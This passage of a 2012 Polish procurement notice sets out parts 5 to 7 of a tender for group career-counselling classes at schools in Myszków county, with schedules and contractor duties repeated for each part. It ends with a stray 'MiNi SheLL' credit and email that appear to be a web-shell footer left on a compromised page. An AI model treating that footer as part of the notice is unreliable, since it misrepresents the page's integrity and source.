7.	Wykonawca przekaże Zamawiającemu najpóźniej dnia następnego po podpisaniu umowy informacje niezbędne do dokonania zgłoszenia Wykonawcy do ubezpieczenia społecznego. (jeżeli obowiązek taki wynika z przepisów).

3.	Do obowiązków Wykonawcy należy :

     a)   pozostawanie w stałym kontakcie z Zamawiającym ( spotkania odpowiednio 
           do potrzeb, kontakt telefoniczny, e-mailowy );
     b) informowanie Zamawiającego o stanie realizacji usługi oraz niezwłoczne, pisemne powiadamianie Zamawiającego o pojawiających się problemach istotnych dla realizacji  
           usługi;
     c)  świadczenie usługi w wymiarze godzinowym określonym przez Zamawiającego w   
          miarę jego potrzeb, od poniedziałku do piątku  z wyjątkiem dni ustawowo wolnych   
          od pracy, w czasie nie pokrywającym się z godzinami zajęć lekcyjnych uczniów 	(przedział godzin: 8:00-19:00).   
          W uzasadnionych przypadkach, za zgodą uczestników projektów i po akceptacji 
          Zamawiającego, możliwa jest realizacja zajęć w sobotę. Szczegółowy wymiar    
          godzinowy oraz terminy realizacji przedmiotu umowy ( harmonogram ) ustalone   
          zostaną ze szkolnymi koordynatorami projektu, przy akceptacji Zamawiającego,  
          w oparciu o analizę planów lekcji, na 2 dni kalendarzowe przed rozpoczęciem 	planowanych  zajęć; 
      d) realizacja usługi na terenie wskazanych przez Zamawiającego szkoły/szkół z powiatu 
          myszkowskiego ( zgodnie z zapisami SIWZ ) na podstawie przekazanego 
          podręcznika, prowadzenie dokumentacji usług w formie pisanej i fotograficznej;
      e)  wykorzystywanie wszystkich materiałów i dokumentów przekazanych przez  
           Zamawiającego, stosowanie wytycznych w zakresie oznaczania projektów                     
           w ramach PO KL i Księgi Identyfikacji  Wizualnej Narodowej Strategii Spójności, 
           umieszczenie na wszystkich materiałach godła Unii Europejskiej  oraz logo 
           Programu Operacyjnego Kapitał Ludzki oraz informacji o współfinansowaniu 
           materiałów ze środków UE w ramach PO KL (zgodnie z wytycznymi dotyczącymi 	oznaczenia projektu, dostępnymi na stronie www.efs.gov.pl);

      f)   Wykonawca podda się okresowej kontroli i ocenie realizacji zamówienia,                 
           w szczególności w celu zbadania stanu realizacji umowy tj. jej efektywności, 
           rzetelności i jakości oraz prawidłowości prowadzonej dokumentacji 
           okołoprojektowej.

4.	Zamawiający zastrzega sobie prawo do kontroli i monitoringu pracy Wykonawcy.


5.	Z wybranym/i w drodze postępowania Wykonawcą/Wykonawcami Zamawiający zawrze umowę/umowy zgodne z załącznikiem nr 8 do SIWZ (jeden wzór dla wszystkich zakresów) z uwzględnieniem jego/ich formy organizacyjno - prawnej..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 16.10.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Przedmiotem zamówienia jest usługa przeprowadzenia zajęć z doradztwa grupowego dla uczniów szkół ponadgimnazjalnych w powiecie myszkowskim w roku szkolnym 2012/2013.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest usługa przeprowadzenia zajęć z doradztwa grupowego dla uczniów szkół ponadgimnazjalnych w powiecie myszkowskim w roku szkolnym 2012/2013
Zakres 5
Usługa grupowego doradztwa zawodowego na rzecz uczniów w Zespole Szkół nr 1 im. E. Kwiatkowskiego w Myszkowie, ul. Kwiatkowskiego 18, 42-300 Myszków w  grupie liczącej maksymalnie 25 osób w godzinach nie pokrywających się z godzinami zajęć lekcyjnych tych uczniów. Doradztwo grupowe będzie się odbywać nie mniej niż 4 razy w tygodniu po 3 godziny lekcyjne w każdym dniu. Zakres zamówienia obejmuje grupowe doradztwo zawodowe na rzecz uczniów w wymiarze 24 godzin lekcyjnych (po 45 minut każda) świadczone w okresie maksymalnie 4 tygodni od dnia rozpoczęcia zajęć z doradztwa grupowego. Przy czym doradztwo grupowe rozpocznie się począwszy od dnia 16.10.2012r. 
Zamawiający dopuszcza możliwość przesunięcia terminu i wydłużenia okresu realizacji  zamówienia.
2.	Informacje dotyczące wszystkich zakresów

Zajęcia z doradztwa grupowego obejmować będą problematykę z zakresu poruszania się po rynku pracy (m.in. zasady pisania CV i listu motywacyjnego, przygotowanie do rozmowy kwalifikacyjnej, gry symulacyjne), podstaw przedsiębiorczości, stereotypów płci, zasad równości, równouprawnienia i przykładów dyskryminacji na rynku pracy. 
Doradztwo grupowe będzie prowadzone w oparciu o materiały dydaktyczne przekazane przez Zamawiającego tj. podręcznik doradcy/ konsultanta zawodowego przygotowany przez Kuratorium Oświaty stanowiący załącznik nr 9 do SIWZ. 
W ramach ostatnich zajęć z doradztwa grupowego konsultant przeprowadzi z uczestnikami ankiety zgodnie ze wzorem przekazanym przez Zamawiającego; wypełnione przez uczestników ankiety Wykonawca przekaże Zamawiającemu.
Wykonawca zobowiązany jest do przedłożenia Zamawiającemu podpisanych przez uczestników list obecności na zajęciach z doradztwa grupowego (wzór listy Zamawiający przekaże Wykonawcy) niezwłocznie po wykonaniu usługi. Listy obecności oraz wypełnione przez uczestników ankiety będą stanowiły podstawę stwierdzenia realizacji zamówienia. 

Do przeprowadzenia zajęć Zamawiający zapewni konsultantowi zawodowemu bezpłatnie sale wykładowe znajdujące się w Zespole Szkół wskazanym w opisie zakresu zamówienia, które Wykonawca będzie realizował. Wykonawca pokrywa koszty dojazdu do sal wykładowych oraz wszelkie inne koszty związane ze świadczeniem usługi w tym wydruki materiałów. 

Przedmiot zamówienia będzie realizowany zgodnie z harmonogramem:
1.	W terminie do 5 dni kalendarzowych od podpisania umowy Zamawiający przekaże Wykonawcy:
a)	wzór listy obecności na zajęciach z doradztwa grupowego,
b)	wzór ankiety uczestnika doradztwa,
2.	Na 6 dni kalendarzowych przed rozpoczęciem zajęć w ramach doradztwa grupowego Zamawiający przekaże wykonawcy:
a)	imienną listę uczestników doradztwa grupowego,
b)	proponowane terminy prowadzenia zajęć z doradztwa grupowego.
3.	Na 2 dni kalendarzowe przed rozpoczęciem zajęć w ramach doradztwa grupowego Wykonawca przekaże Zamawiającemu harmonogram zajęć w ramach doradztwa grupowego.
4.	Zajęcia w ramach doradztwo grupowego rozpoczną się począwszy od dnia 16.10.2012r. Przy czym, Zamawiający dopuszcza możliwość przesunięcia terminu i wydłużenia okresu realizacji zamówienia w przypadkach określonych w pkt XVI SIWZ.
5.	W terminie do 3 dni kalendarzowych od dnia zakończenia zajęć w ramach doradztwa grupowego, Wykonawca przekaże Zamawiającemu:
a)	podpisane przez uczniów uczestniczących w zajęciach doradztwa grupowego listy obecności,
b)	wypełnione przez uczestników doradztwa grupowego ankiety.  
6.	Po wykonaniu zajęć z doradztwa grupowego, zostanie sporządzony protokół odbioru usługi, podpisany przez Wykonawcę i Zamawiającego. Podpisanie bez zastrzeżeń przez obie Strony protokołu odbioru z wykonania usługi jest podstawą do wystawienia faktury/ rachunku za wykonanie usługi.
7.	Wykonawca przekaże Zamawiającemu najpóźniej dnia następnego po podpisaniu umowy informacje niezbędne do dokonania zgłoszenia Wykonawcy do ubezpieczenia społecznego. (jeżeli obowiązek taki wynika z przepisów).

3.	Do obowiązków Wykonawcy należy :

     a)   pozostawanie w stałym kontakcie z Zamawiającym ( spotkania odpowiednio 
           do potrzeb, kontakt telefoniczny, e-mailowy );
     b) informowanie Zamawiającego o stanie realizacji usługi oraz niezwłoczne, pisemne powiadamianie Zamawiającego o pojawiających się problemach istotnych dla realizacji  
           usługi;
     c)  świadczenie usługi w wymiarze godzinowym określonym przez Zamawiającego w   
          miarę jego potrzeb, od poniedziałku do piątku  z wyjątkiem dni ustawowo wolnych   
          od pracy, w czasie nie pokrywającym się z godzinami zajęć lekcyjnych uczniów 	(przedział godzin: 8:00-19:00).   
          W uzasadnionych przypadkach, za zgodą uczestników projektów i po akceptacji 
          Zamawiającego, możliwa jest realizacja zajęć w sobotę. Szczegółowy wymiar    
          godzinowy oraz terminy realizacji przedmiotu umowy ( harmonogram ) ustalone   
          zostaną ze szkolnymi koordynatorami projektu, przy akceptacji Zamawiającego,  
          w oparciu o analizę planów lekcji, na 2 dni kalendarzowe przed rozpoczęciem 	planowanych  zajęć; 
      d) realizacja usługi na terenie wskazanych przez Zamawiającego szkoły/szkół z powiatu 
          myszkowskiego ( zgodnie z zapisami SIWZ ) na podstawie przekazanego 
          podręcznika, prowadzenie dokumentacji usług w formie pisanej i fotograficznej;
      e)  wykorzystywanie wszystkich materiałów i dokumentów przekazanych przez  
           Zamawiającego, stosowanie wytycznych w zakresie oznaczania projektów                     
           w ramach PO KL i Księgi Identyfikacji  Wizualnej Narodowej Strategii Spójności, 
           umieszczenie na wszystkich materiałach godła Unii Europejskiej  oraz logo 
           Programu Operacyjnego Kapitał Ludzki oraz informacji o współfinansowaniu 
           materiałów ze środków UE w ramach PO KL (zgodnie z wytycznymi dotyczącymi 	oznaczenia projektu, dostępnymi na stronie www.efs.gov.pl);

      f)   Wykonawca podda się okresowej kontroli i ocenie realizacji zamówienia,                 
           w szczególności w celu zbadania stanu realizacji umowy tj. jej efektywności, 
           rzetelności i jakości oraz prawidłowości prowadzonej dokumentacji 
           okołoprojektowej.

4.	Zamawiający zastrzega sobie prawo do kontroli i monitoringu pracy Wykonawcy.


5.	Z wybranym/i w drodze postępowania Wykonawcą/Wykonawcami Zamawiający zawrze umowę/umowy zgodne z załącznikiem nr 8 do SIWZ (jeden wzór dla wszystkich zakresów) z uwzględnieniem jego/ich formy organizacyjno - prawnej..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 16.10.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Przedmiotem zamówienia jest usługa przeprowadzenia zajęć z doradztwa grupowego dla uczniów szkół ponadgimnazjalnych w powiecie myszkowskim w roku szkolnym 2012/2013.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest usługa przeprowadzenia zajęć z doradztwa grupowego dla uczniów szkół ponadgimnazjalnych w powiecie myszkowskim w roku szkolnym 2012/2013
Zakres 6
Usługa grupowego doradztwa zawodowego na rzecz uczniów Technikum w Zespole Szkół im. T. Kościuszki w Żarkach, ul. Myszkowska 50, 42-310 Żarki w  grupie liczącej maksymalnie 16 osób w godzinach nie pokrywających się z godzinami zajęć lekcyjnych tych uczniów. Doradztwo grupowe będzie się odbywać nie mniej niż 4 razy w tygodniu po 3 godziny lekcyjne w każdym dniu. Zakres zamówienia obejmuje grupowe doradztwo zawodowe na rzecz uczniów w wymiarze 24 godzin lekcyjnych (po 45 minut każda) świadczone w okresie maksymalnie 4 tygodni od dnia rozpoczęcia zajęć z doradztwa grupowego. Przy czym doradztwo grupowe rozpocznie się począwszy od dnia 16.10.2012r. 
Zamawiający dopuszcza możliwość przesunięcia terminu i wydłużenia okresu realizacji  zamówienia.
2.	Informacje dotyczące wszystkich zakresów

Zajęcia z doradztwa grupowego obejmować będą problematykę z zakresu poruszania się po rynku pracy (m.in. zasady pisania CV i listu motywacyjnego, przygotowanie do rozmowy kwalifikacyjnej, gry symulacyjne), podstaw przedsiębiorczości, stereotypów płci, zasad równości, równouprawnienia i przykładów dyskryminacji na rynku pracy. 
Doradztwo grupowe będzie prowadzone w oparciu o materiały dydaktyczne przekazane przez Zamawiającego tj. podręcznik doradcy/ konsultanta zawodowego przygotowany przez Kuratorium Oświaty stanowiący załącznik nr 9 do SIWZ. 
W ramach ostatnich zajęć z doradztwa grupowego konsultant przeprowadzi z uczestnikami ankiety zgodnie ze wzorem przekazanym przez Zamawiającego; wypełnione przez uczestników ankiety Wykonawca przekaże Zamawiającemu.
Wykonawca zobowiązany jest do przedłożenia Zamawiającemu podpisanych przez uczestników list obecności na zajęciach z doradztwa grupowego (wzór listy Zamawiający przekaże Wykonawcy) niezwłocznie po wykonaniu usługi. Listy obecności oraz wypełnione przez uczestników ankiety będą stanowiły podstawę stwierdzenia realizacji zamówienia. 

Do przeprowadzenia zajęć Zamawiający zapewni konsultantowi zawodowemu bezpłatnie sale wykładowe znajdujące się w Zespole Szkół wskazanym w opisie zakresu zamówienia, które Wykonawca będzie realizował. Wykonawca pokrywa koszty dojazdu do sal wykładowych oraz wszelkie inne koszty związane ze świadczeniem usługi w tym wydruki materiałów. 

Przedmiot zamówienia będzie realizowany zgodnie z harmonogramem:
1.	W terminie do 5 dni kalendarzowych od podpisania umowy Zamawiający przekaże Wykonawcy:
a)	wzór listy obecności na zajęciach z doradztwa grupowego,
b)	wzór ankiety uczestnika doradztwa,
2.	Na 6 dni kalendarzowych przed rozpoczęciem zajęć w ramach doradztwa grupowego Zamawiający przekaże wykonawcy:
a)	imienną listę uczestników doradztwa grupowego,
b)	proponowane terminy prowadzenia zajęć z doradztwa grupowego.
3.	Na 2 dni kalendarzowe przed rozpoczęciem zajęć w ramach doradztwa grupowego Wykonawca przekaże Zamawiającemu harmonogram zajęć w ramach doradztwa grupowego.
4.	Zajęcia w ramach doradztwo grupowego rozpoczną się począwszy od dnia 16.10.2012r. Przy czym, Zamawiający dopuszcza możliwość przesunięcia terminu i wydłużenia okresu realizacji zamówienia w przypadkach określonych w pkt XVI SIWZ.
5.	W terminie do 3 dni kalendarzowych od dnia zakończenia zajęć w ramach doradztwa grupowego, Wykonawca przekaże Zamawiającemu:
a)	podpisane przez uczniów uczestniczących w zajęciach doradztwa grupowego listy obecności,
b)	wypełnione przez uczestników doradztwa grupowego ankiety.  
6.	Po wykonaniu zajęć z doradztwa grupowego, zostanie sporządzony protokół odbioru usługi, podpisany przez Wykonawcę i Zamawiającego. Podpisanie bez zastrzeżeń przez obie Strony protokołu odbioru z wykonania usługi jest podstawą do wystawienia faktury/ rachunku za wykonanie usługi.
7.	Wykonawca przekaże Zamawiającemu najpóźniej dnia następnego po podpisaniu umowy informacje niezbędne do dokonania zgłoszenia Wykonawcy do ubezpieczenia społecznego. (jeżeli obowiązek taki wynika z przepisów).

3.	Do obowiązków Wykonawcy należy :

     a)   pozostawanie w stałym kontakcie z Zamawiającym ( spotkania odpowiednio 
           do potrzeb, kontakt telefoniczny, e-mailowy );
     b) informowanie Zamawiającego o stanie realizacji usługi oraz niezwłoczne, pisemne powiadamianie Zamawiającego o pojawiających się problemach istotnych dla realizacji  
           usługi;
     c)  świadczenie usługi w wymiarze godzinowym określonym przez Zamawiającego w   
          miarę jego potrzeb, od poniedziałku do piątku  z wyjątkiem dni ustawowo wolnych   
          od pracy, w czasie nie pokrywającym się z godzinami zajęć lekcyjnych uczniów 	(przedział godzin: 8:00-19:00).   
          W uzasadnionych przypadkach, za zgodą uczestników projektów i po akceptacji 
          Zamawiającego, możliwa jest realizacja zajęć w sobotę. Szczegółowy wymiar    
          godzinowy oraz terminy realizacji przedmiotu umowy ( harmonogram ) ustalone   
          zostaną ze szkolnymi koordynatorami projektu, przy akceptacji Zamawiającego,  
          w oparciu o analizę planów lekcji, na 2 dni kalendarzowe przed rozpoczęciem 	planowanych  zajęć; 
      d) realizacja usługi na terenie wskazanych przez Zamawiającego szkoły/szkół z powiatu 
          myszkowskiego ( zgodnie z zapisami SIWZ ) na podstawie przekazanego 
          podręcznika, prowadzenie dokumentacji usług w formie pisanej i fotograficznej;
      e)  wykorzystywanie wszystkich materiałów i dokumentów przekazanych przez  
           Zamawiającego, stosowanie wytycznych w zakresie oznaczania projektów                     
           w ramach PO KL i Księgi Identyfikacji  Wizualnej Narodowej Strategii Spójności, 
           umieszczenie na wszystkich materiałach godła Unii Europejskiej  oraz logo 
           Programu Operacyjnego Kapitał Ludzki oraz informacji o współfinansowaniu 
           materiałów ze środków UE w ramach PO KL (zgodnie z wytycznymi dotyczącymi 	oznaczenia projektu, dostępnymi na stronie www.efs.gov.pl);

      f)   Wykonawca podda się okresowej kontroli i ocenie realizacji zamówienia,                 
           w szczególności w celu zbadania stanu realizacji umowy tj. jej efektywności, 
           rzetelności i jakości oraz prawidłowości prowadzonej dokumentacji 
           okołoprojektowej.

4.	Zamawiający zastrzega sobie prawo do kontroli i monitoringu pracy Wykonawcy.


5.	Z wybranym/i w drodze postępowania Wykonawcą/Wykonawcami Zamawiający zawrze umowę/umowy zgodne z załącznikiem nr 8 do SIWZ (jeden wzór dla wszystkich zakresów) z uwzględnieniem jego/ich formy organizacyjno - prawnej..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 16.10.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Przedmiotem zamówienia jest usługa przeprowadzenia zajęć z doradztwa grupowego dla uczniów szkół ponadgimnazjalnych w powiecie myszkowskim w roku szkolnym 2012/2013.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest usługa przeprowadzenia zajęć z doradztwa grupowego dla uczniów szkół ponadgimnazjalnych w powiecie myszkowskim w roku szkolnym 2012/2013
Zakres 7
Usługa grupowego doradztwa zawodowego na rzecz uczniów Technikum w Zespole Szkół im. T. Kościuszki w Żarkach, ul. Myszkowska 50, 42-310 Żarki w  grupie liczącej maksymalnie 16 osób w godzinach nie pokrywających się z godzinami zajęć lekcyjnych tych uczniów. Doradztwo grupowe będzie się odbywać nie mniej niż 4 razy w tygodniu po 3 godziny lekcyjne w każdym dniu. Zakres zamówienia obejmuje grupowe doradztwo zawodowe na rzecz uczniów w wymiarze 24 godzin lekcyjnych (po 45 minut każda) świadczone w okresie maksymalnie 4 tygodni od dnia rozpoczęcia zajęć z doradztwa grupowego. Przy czym doradztwo grupowe rozpocznie się począwszy od dnia 16.10.2012r. 
Zamawiający dopuszcza możliwość przesunięcia terminu i wydłużenia okresu realizacji  zamówienia.

2.	Informacje dotyczące wszystkich zakresów

Zajęcia z doradztwa grupowego obejmować będą problematykę z zakresu poruszania się po rynku pracy (m.in. zasady pisania CV i listu motywacyjnego, przygotowanie do rozmowy kwalifikacyjnej, gry symulacyjne), podstaw przedsiębiorczości, stereotypów płci, zasad równości, równouprawnienia i przykładów dyskryminacji na rynku pracy. 
Doradztwo grupowe będzie prowadzone w oparciu o materiały dydaktyczne przekazane przez Zamawiającego tj. podręcznik doradcy/ konsultanta zawodowego przygotowany przez Kuratorium Oświaty stanowiący załącznik nr 9 do SIWZ. 
W ramach ostatnich zajęć z doradztwa grupowego konsultant przeprowadzi z uczestnikami ankiety zgodnie ze wzorem przekazanym przez Zamawiającego; wypełnione przez uczestników ankiety Wykonawca przekaże Zamawiającemu.
Wykonawca zobowiązany jest do przedłożenia Zamawiającemu podpisanych przez uczestników list obecności na zajęciach z doradztwa grupowego (wzór listy Zamawiający przekaże Wykonawcy) niezwłocznie po wykonaniu usługi. Listy obecności oraz wypełnione przez uczestników ankiety będą stanowiły podstawę stwierdzenia realizacji zamówienia. 

Do przeprowadzenia zajęć Zamawiający zapewni konsultantowi zawodowemu bezpłatnie sale wykładowe znajdujące się w Zespole Szkół wskazanym w opisie zakresu zamówienia, które Wykonawca będzie realizował. Wykonawca pokrywa koszty dojazdu do sal wykładowych oraz wszelkie inne koszty związane ze świadczeniem usługi w tym wydruki materiałów. 

Przedmiot zamówienia będzie realizowany zgodnie z harmonogramem:
1.	W terminie do 5 dni kalendarzowych od podpisania umowy Zamawiający przekaże Wykonawcy:
a)	wzór listy obecności na zajęciach z doradztwa grupowego,
b)	wzór ankiety uczestnika doradztwa,
2.	Na 6 dni kalendarzowych przed rozpoczęciem zajęć w ramach doradztwa grupowego Zamawiający przekaże wykonawcy:
a)	imienną listę uczestników doradztwa grupowego,
b)	proponowane terminy prowadzenia zajęć z doradztwa grupowego.
3.	Na 2 dni kalendarzowe przed rozpoczęciem zajęć w ramach doradztwa grupowego Wykonawca przekaże Zamawiającemu harmonogram zajęć w ramach doradztwa grupowego.
4.	Zajęcia w ramach doradztwo grupowego rozpoczną się począwszy od dnia 16.10.2012r. Przy czym, Zamawiający dopuszcza możliwość przesunięcia terminu i wydłużenia okresu realizacji zamówienia w przypadkach określonych w pkt XVI SIWZ.
5.	W terminie do 3 dni kalendarzowych od dnia zakończenia zajęć w ramach doradztwa grupowego, Wykonawca przekaże Zamawiającemu:
a)	podpisane przez uczniów uczestniczących w zajęciach doradztwa grupowego listy obecności,
b)	wypełnione przez uczestników doradztwa grupowego ankiety.  
6.	Po wykonaniu zajęć z doradztwa grupowego, zostanie sporządzony protokół odbioru usługi, podpisany przez Wykonawcę i Zamawiającego. Podpisanie bez zastrzeżeń przez obie Strony protokołu odbioru z wykonania usługi jest podstawą do wystawienia faktury/ rachunku za wykonanie usługi.
7.	Wykonawca przekaże Zamawiającemu najpóźniej dnia następnego po podpisaniu umowy informacje niezbędne do dokonania zgłoszenia Wykonawcy do ubezpieczenia społecznego. (jeżeli obowiązek taki wynika z przepisów).

3.	Do obowiązków Wykonawcy należy :

     a)   pozostawanie w stałym kontakcie z Zamawiającym ( spotkania odpowiednio 
           do potrzeb, kontakt telefoniczny, e-mailowy );
     b) informowanie Zamawiającego o stanie realizacji usługi oraz niezwłoczne, pisemne powiadamianie Zamawiającego o pojawiających się problemach istotnych dla realizacji  
           usługi;
     c)  świadczenie usługi w wymiarze godzinowym określonym przez Zamawiającego w   
          miarę jego potrzeb, od poniedziałku do piątku  z wyjątkiem dni ustawowo wolnych   
          od pracy, w czasie nie pokrywającym się z godzinami zajęć lekcyjnych uczniów 	(przedział godzin: 8:00-19:00).   
          W uzasadnionych przypadkach, za zgodą uczestników projektów i po akceptacji 
          Zamawiającego, możliwa jest realizacja zajęć w sobotę. Szczegółowy wymiar    
          godzinowy oraz terminy realizacji przedmiotu umowy ( harmonogram ) ustalone   
          zostaną ze szkolnymi koordynatorami projektu, przy akceptacji Zamawiającego,  
          w oparciu o analizę planów lekcji, na 2 dni kalendarzowe przed rozpoczęciem 	planowanych  zajęć; 
      d) realizacja usługi na terenie wskazanych przez Zamawiającego szkoły/szkół z powiatu 
          myszkowskiego ( zgodnie z zapisami SIWZ ) na podstawie przekazanego 
          podręcznika, prowadzenie dokumentacji usług w formie pisanej i fotograficznej;
      e)  wykorzystywanie wszystkich materiałów i dokumentów przekazanych przez  
           Zamawiającego, stosowanie wytycznych w zakresie oznaczania projektów                     
           w ramach PO KL i Księgi Identyfikacji  Wizualnej Narodowej Strategii Spójności, 
           umieszczenie na wszystkich materiałach godła Unii Europejskiej  oraz logo 
           Programu Operacyjnego Kapitał Ludzki oraz informacji o współfinansowaniu 
           materiałów ze środków UE w ramach PO KL (zgodnie z wytycznymi dotyczącymi 	oznaczenia projektu, dostępnymi na stronie www.efs.gov.pl);

      f)   Wykonawca podda się okresowej kontroli i ocenie realizacji zamówienia,                 
           w szczególności w celu zbadania stanu realizacji umowy tj. jej efektywności, 
           rzetelności i jakości oraz prawidłowości prowadzonej dokumentacji 
           okołoprojektowej.

4.	Zamawiający zastrzega sobie prawo do kontroli i monitoringu pracy Wykonawcy.


5.	Z wybranym/i w drodze postępowania Wykonawcą/Wykonawcami Zamawiający zawrze umowę/umowy zgodne z załącznikiem nr 8 do SIWZ (jeden wzór dla wszystkich zakresów) z uwzględnieniem jego/ich formy organizacyjno - prawnej..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 16.10.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com